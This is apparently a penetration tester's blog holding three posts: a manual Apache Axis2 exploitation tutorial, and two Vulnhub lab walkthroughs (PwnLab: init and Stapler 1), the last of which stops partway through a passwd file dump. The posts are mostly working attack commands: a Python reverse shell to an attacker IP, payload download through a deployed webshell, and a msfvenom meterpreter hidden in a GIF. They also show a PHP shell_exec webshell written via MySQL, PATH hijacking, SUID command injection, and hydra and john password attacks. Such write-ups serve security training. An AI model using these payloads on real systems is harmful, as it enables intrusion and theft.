Thursday, March 9, 2017

Manually Exploiting Apache Axis2

Disclaimer:

I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.

Prerequisites

For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console
    • https://victim.com/axis2/axis2-admin

Discovery

There are a couple of ways to potentially find credentials for Axis2 servers. Some of these include: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file. This can be discovered using modules in Nmap and OpenVAS.

Nmap


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2

OpenVAS

FYI

  • There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
  • The code can be found at Github.
  • I have tried this exploit multiple times with no success.

Manual Validation

  1.  Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will allow us to get the credentials. They should look like this:
  2. <parameter name="userName">admin</parameter> 
    <parameter name="password">axis2</parameter>
    
  3. When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.

Create the Payload

A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build

Exploit

  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
  4. Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
    • Get a shell and modify it to your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
        
    • Download your reverse shell from your webserver to the victim machine.
      • https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
      • https://victom.com/axis2/services/AxisInvoker/exec?cmd=python%20test.py
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!

Wednesday, August 31, 2016

PwnLab: init Vulnhub Walkthrough

Information Gathering

First, I run a TCP Scan to enumerate the host.
$nmap -vv -n -Pn -p- -sV -A 192.168.56.103

PORT      STATE SERVICE REASON         VERSION
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          37203/udp  status
|_  100024  1          50129/tcp  status
3306/tcp  open  mysql   syn-ack ttl 64 MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 53
|   Version: .5.47-0+deb8u1
|   Thread ID: 39
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, Support41Auth, SupportsCompression, Speaks41ProtocolNew, SupportsLoadDataLocal, FoundRows, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, InteractiveClient, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn
|   Status: Autocommit
|_  Salt: :LQ3IVT$U^Y&O>%?LCI$
50129/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:94:0C:7C (Oracle VirtualBox virtual NIC)

Local Privilege

With the help of an article (https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/), I was able to find a PHP local file inclusion. I was then able to curl the page information and base64 decode it.
curl http://192.168.56.103/?page=php://filter/convert.base64-encode/resource=config

Config.php
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
I also pulled down the source for the upload page, to find how to bypass filtering and upload a shell.
upload.php

<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png"); 

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }

        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}

?>
From upload.php I learn that only users that are logged in are authorized to upload. So I login to mysql using the credentials from config.php and dump the users table. They are base64 encoded, so I decode those as well.
root@kali:~/Desktop# mysql -u root -p -h 192.168.56.103
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1558
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.00 sec)

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> Select * from users;
+------+------------------+---------------+
| user | pass             | Base64 Decode |
+------+------------------+---------------+
| kent | Sld6WHVCSkpOeQ== | JWzXuBJJNy    |
| mike | U0lmZHNURW42SQ== | SIfdsTEn6I    |
| kane | aVN2NVltMkdSbw== | iSv5Ym2GRo    |
+------+------------------+---------------+
3 rows in set (0.00 sec)
Knowing that only image types can be uploaded, I embed a php meterpreter into a malicious gif using msfvenom.
root@kali:~/Desktop# echo GIF98 > shell.gif
root@kali:~/Desktop# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.101 LPORT=443 >> shell.gif
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 26801 bytes
I also found an LFI in index.php that will help us execute that shell.
index.php
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
...
I then upload the shell.gif into the uploader, and get the id of the file by browsing to the directory (http://192.168.56.103/upload/). Then I browse to index.php and tamper with the lang cookie using a proxy to invoke my malicious gif.

Privilege Escalation

This creates a meterpreter session and I use python to gain a TTY.
meterpreter > shell
Process 1435 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
I switch users to kane with credential reuse. Once I become kane, I notice a SUID binary in kane's home folder owned by mike. I run strings on the executable to potentially see what is going on.
kane@pwnlab:~$ ls -lah
ls -lah
total 28K
drwxr-x--- 2 kane kane 4.0K Mar 17 13:04 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kane kane  220 Mar 17 10:09 .bash_logout
-rw-r--r-- 1 kane kane 3.5K Mar 17 10:09 .bashrc
-rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17 10:09 .profile
kane@pwnlab:~$ strings msgmike
...
cat /home/mike/msg.txt
...
kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
By changing the order of the PATH execution, I can create my own cat that will run a shell as mike.
kane@pwnlab:~$ echo "/bin/sh" > cat       
echo "/bin/sh" > cat
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=.:$PATH
export PATH=.:$PATH
kane@pwnlab:~$ echo $PATH
echo $PATH
.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ ./msgmike
./msgmike
$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
Now that I am mike, I move to the mike directory. where I find another SUID binary, but this time it is for root. I run strings to understand what it is doing. I come to learn that it is doing a basic string substitution that is a perfect basic command execution.
$ cd /home/mike
$ ls -lah
total 28K
drwxr-x--- 2 mike mike 4.0K Mar 17 15:19 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 mike mike  220 Mar 17 10:08 .bash_logout
-rw-r--r-- 1 mike mike 3.5K Mar 17 10:08 .bashrc
-rwsr-sr-x 1 root root 5.3K Mar 17 13:07 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17 10:08 .profile
$ strings msg2root
...
Message for root: 
/bin/echo %s >> /root/messages.txt
...
I append a shell to escalate my privilege to root. Then I am able to find and print the flag.
$ ./msg2root
./msg2root
Message for root: test;/bin/sh
test;/bin/sh
test
# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
# ls -lah /root
ls -lah /root
total 20K
drwx------  2 root root 4.0K Mar 17 15:17 .
drwxr-xr-x 21 root root 4.0K Mar 17 09:13 ..
lrwxrwxrwx  1 root root    9 Mar 17 10:06 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
----------  1 root root 1.8K Mar 17 15:17 flag.txt
lrwxrwxrwx  1 root root    9 Mar 17 13:10 messages.txt -> /dev/null
lrwxrwxrwx  1 root root    9 Mar 17 13:10 .mysql_history -> /dev/null
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
# cat /root/flag.txt
cat /root/flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
# 
Special thanks to Claor for making this VM. That early PHP LFI was really interesting!

Monday, August 29, 2016

Stapler 1: Vulnhub Walkthrough

Information Gathering

I started by doing an Nmap TCP and UDP scan to enumerate the services.
PORT    STATE         SERVICE     REASON              VERSION
53/udp  open          domain      udp-response ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
68/udp  open|filtered dhcpc       no-response
69/udp  open|filtered tftp        no-response
137/udp open          netbios-ns  udp-response ttl 64 Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm no-response
MAC Address: 08:00:27:BB:06:52 (Oracle VirtualBox virtual NIC)

nmap -vv -n -Pn -p- -sV -A 192.168.56.102
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-29 12:53 MDT
NSE: Loaded 138 scripts for scanning.
Host is up, received arp-response (0.00033s latency).
Scanned at 2016-08-29 12:53:12 MDT for 157s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT      STATE  SERVICE     REASON         VERSION
20/tcp    closed ftp-data    reset ttl 64
21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
53/tcp    open   domain      syn-ack ttl 64 dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        syn-ack ttl 64
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp   closed ntp         reset ttl 64
137/tcp   closed netbios-ns  reset ttl 64
138/tcp   closed netbios-dgm reset ttl 64
139/tcp   open   netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?       syn-ack ttl 64
3306/tcp  open   mysql       syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 53
|   Version: .7.12-0ubuntu1
|   Thread ID: 8
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, Support41Auth, SupportsCompression, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, IgnoreSigpipes, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: I)\x19f\x1CHS\j+2c\x1DnmS+y?c
12380/tcp open   http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech

Local Privilege

Local Privilege 1: HTTPS 12380

Due to the fact there is no index.html, I check robots.txt.
https://192.168.56.102:12380/robots.txt
        User-agent: *
        Disallow: /admin112233/
        Disallow: /blogblog/

I see that admin112233 is unfinished but blogblog is a Wordpress application! I then run wpscan on it to enumerate the vulnerabilities.
wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate u

    [+] Enumerating usernames ...
    [+] Identified the following 10 user/s:
        +----+---------+-----------------+
        | Id | Login   | Name            |
        +----+---------+-----------------+
        | 1  | john    | John Smith      |
        | 2  | elly    | Elly Jones      |
        | 3  | peter   | Peter Parker    |
        | 4  | barry   | Barry Atkins    |
        | 5  | heather | Heather Neville |
        | 6  | garry   | garry           |
        | 7  | harry   | harry           |
        | 8  | scott   | scott           |
        | 9  | kathy   | kathy           |
        | 10 | tim     | tim             |
        +----+---------+-----------------+

wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate ap

    [+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
     |  Latest version: 1.0 (up to date)
     |  Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
     |  Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
    [!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

I find that advanced-video-embed-embed-videos-or-playlists - v1.0 has a local file inclusion vulnerability on Exploit-db. This can be found at: https://www.exploit-db.com/exploits/39646/. I am able to download the exploit and modify it for SSL using the following code.
    import ssl

    ssl._create_default_https_context = ssl._create_unverified_context
    url = "https://192.168.56.102:12380/blogblog"

With this vulnerability, I was able to download both wp-config.php and /etc/passwd. After executing the file, I browsed to: https://192.168.56.102:12380/blogblog/wp-content/uploads/ to see the random id assigned to my file. If you attempt to view this in the browser it will fail because it cannot render a configuration as a jpeg. I pulled down the text with curl.
../wp-config.php
        define('DB_NAME', 'wordpress');

        /** MySQL database username */
        define('DB_USER', 'root');

        /** MySQL database password */
        define('DB_PASSWORD', 'plbkac');

        /** MySQL hostname */
        define('DB_HOST', 'localhost');

../../../../etc/passwd

    root:x:0:0:root:/root:/bin/zsh
    ...
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    ...
    peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
    mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
    RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
    ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
    DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
    AParnell:x:1004:1004::/home/AParnell:/bin/bash
    SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
    MBassin:x:1006:1006::/home/MBassin:/bin/bash
    JBare:x:1007:1007::/home/JBare:/bin/bash
    LSolum:x:1008:1008::/home/LSolum:/bin/bash
    IChadwick:x:1009:1009::/home/IChadwick:/bin/false
    MFrei:x:1010:1010::/home/MFrei:/bin/bash
    SStroud:x:1011:1011::/home/SStroud:/bin/bash
    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
    postfix:x:112:118::/var/spool/postfix:/bin/false
    ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
    elly:x:1029:1029::/home/elly:/bin/bash

Using the root password, you can enumerate and get a shell with either phpmyadmin or mysql remote access. I chose mysql remote access.
mysql -u root -p -h 192.168.56.102
show databases;
use wordpress;
show tables;
mysql> Select user_login, user_pass from wp_users;
    +------------+------------------------------------+
    | user_login | user_pass                          |
    +------------+------------------------------------+
    | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
    | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
    | Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
    | barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
    | heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
    | garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
    | harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
    | scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
    | kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
    | tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
    | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
    | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
    | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
    | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
    | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
    | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
    +------------+------------------------------------+
mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)

I was then able to access the shell via curl
curl -k https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:bb:06:52  
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:343006 errors:0 dropped:0 overruns:0 frame:0
          TX packets:154479 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:46270812 (46.2 MB)  TX bytes:56110368 (56.1 MB)
          Interrupt:10 Base address:0xd000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:180 errors:0 dropped:0 overruns:0 frame:0
          TX packets:180 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:24245 (24.2 KB)  TX bytes:24245 (24.2 KB)

Since webshells are poor, I upgraded to a more stable shell using python and then using python after to obtain at TTY.
https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty;pty.spawn("/bin/bash")'

There are other things you can enumerate such as:


  • Mysql passwords (I already have root)
  • The loot database (Which has interesting info but no passwords)
  • Proof (Which contains a memo to the DBA)


  • I formatted the passwords and used John to crack them to the best of my ability.
    john stapler.wpusers
    
        Elly:ylle
        garry:football
        harry:monkey
        scott:cookie
        tim:thumb
        Simon:TOM
    
    6 password hashes cracked, 10 left
    

    Local Privilege 2: Bruteforce

    I was able to enumerate users for a bruteforce three ways: banners, SMB, and FTP.

    Banner User Enumeration

    This method is pretty self explanatory. By probing the banners, I am able to find users to bruteforce.
    FTP: Harry, Elly, John
    SSH: Barry
    SMB: Kathy, Fred
    HTTPS: Tim
    

    SMB User Enumeration

    By using enum4linux against a verbose SMB, I am able to enumerate the users for a bruteforce.
    enum4linux 192.168.56.102
    S-1-22-1-1000 Unix User\peter (Local User)
    S-1-22-1-1001 Unix User\RNunemaker (Local User)
    S-1-22-1-1002 Unix User\ETollefson (Local User)
    S-1-22-1-1003 Unix User\DSwanger (Local User)
    S-1-22-1-1004 Unix User\AParnell (Local User)
    S-1-22-1-1006 Unix User\MBassin (Local User)
    S-1-22-1-1007 Unix User\JBare (Local User)
    S-1-22-1-1008 Unix User\LSolum (Local User)
    S-1-22-1-1009 Unix User\IChadwick (Local User)
    S-1-22-1-1010 Unix User\MFrei (Local User)
    S-1-22-1-1011 Unix User\SStroud (Local User)
    S-1-22-1-1012 Unix User\CCeaser (Local User)
    S-1-22-1-1013 Unix User\JKanode (Local User)
    S-1-22-1-1014 Unix User\CJoo (Local User)
    S-1-22-1-1015 Unix User\Eeth (Local User)
    S-1-22-1-1016 Unix User\LSolum2 (Local User)
    S-1-22-1-1017 Unix User\JLipps (Local User)
    S-1-22-1-1018 Unix User\jamie (Local User)
    S-1-22-1-1020 Unix User\Drew (Local User)
    S-1-22-1-1021 Unix User\jess (Local User)
    S-1-22-1-1023 Unix User\Taylor (Local User)
    S-1-22-1-1025 Unix User\kai (Local User)
    S-1-22-1-1026 Unix User\zoe (Local User)
    S-1-22-1-1027 Unix User\NATHAN (Local User)
    S-1-22-1-1028 Unix User\www (Local User)
    S-1-22-1-1029 Unix User\elly (Local User)
    

    FTP User Enumeration

    Using Anonymous logins, I am able to enumerate some users.
    21/tcp    open   ftp         syn-ack ttl 64 vsftpd 2.0.8 or later
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    
    root@kali:~/Downloads# ftp 192.168.56.102
    Connected to 192.168.56.102.
    220-
    220-|-----------------------------------------------------------------------------------------|
    220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    220-|-----------------------------------------------------------------------------------------|
    220-
    220 
    Name (192.168.56.102:root): Anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             107 Jun 03 23:06 note
    226 Directory send OK.
    ftp> get note
    local: note remote: note
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for note (107 bytes).
    226 Transfer complete.
    107 bytes received in 0.00 secs (50.1884 kB/s)
    ftp> ^C
    ftp> 221 Goodbye.
    root@kali:~/Downloads# cat note 
    Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
    

    The Attack

    I am then able to use the users I found, to bruteforce the ftp users.
    root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ftp
    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:33:53
    [DATA] max 9 tasks per 1 server, overall 64 tasks, 9 login tries (l:3/p:3), ~0 tries per task
    [DATA] attacking service ftp on port 21
    [21][ftp] host: 192.168.56.102   login: elly   password: ylle
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:33:57
    

    I am then able to FTP login as Elly and pull down all the sensitive files. The most useful file to pull down is /etc/passwd and use it to ssh bruteforce. Using this, I am able to obtain a a local shell as SHayslett.
    root@kali:~/Downloads# ftp 192.168.56.102
    Connected to 192.168.56.102.
    220-
    220-|-----------------------------------------------------------------------------------------|
    220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    220-|-----------------------------------------------------------------------------------------|
    220-
    220 
    Name (192.168.56.102:root): elly
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> get passwd
    local: passwd remote: passwd
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for passwd (2942 bytes).
    226 Transfer complete.
    2942 bytes received in 0.00 secs (35.0714 MB/s)
    ftp> get shadow
    local: shadow remote: shadow
    200 PORT command successful. Consider using PASV.
    550 Failed to open file.
    ftp> get vsftpd.conf
    local: vsftpd.conf remote: vsftpd.conf
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for vsftpd.conf (5961 bytes).
    226 Transfer complete.
    5961 bytes received in 0.00 secs (50.3084 MB/s)
    ftp> get ftpusers
    local: ftpusers remote: ftpusers
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for ftpusers (132 bytes).
    226 Transfer complete.
    132 bytes received in 0.00 secs (1.6564 MB/s)
    ftp> 221 Goodbye.
    root@kali:~/Downloads# cat passwd
    root:x:0:0:root:/root:/bin/zsh
    peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
    mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
    RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
    ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
    DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
    AParnell:x:1004:1004::/home/AParnell:/bin/bash
    SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
    MBassin:x:1006:1006::/home/MBassin:/bin/bash
    JBare:x:1007:1007::/home/JBare:/bin/bash
    LSolum:x:1008:1008::/home/LSolum:/bin/bash
    IChadwick:x:1009:1009::/home/IChadwick:/bin/false
    MFrei:x:1010:1010::/home/MFrei:/bin/bash
    SStroud:x:1011:1011::/home/SStroud:/bin/bash
    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
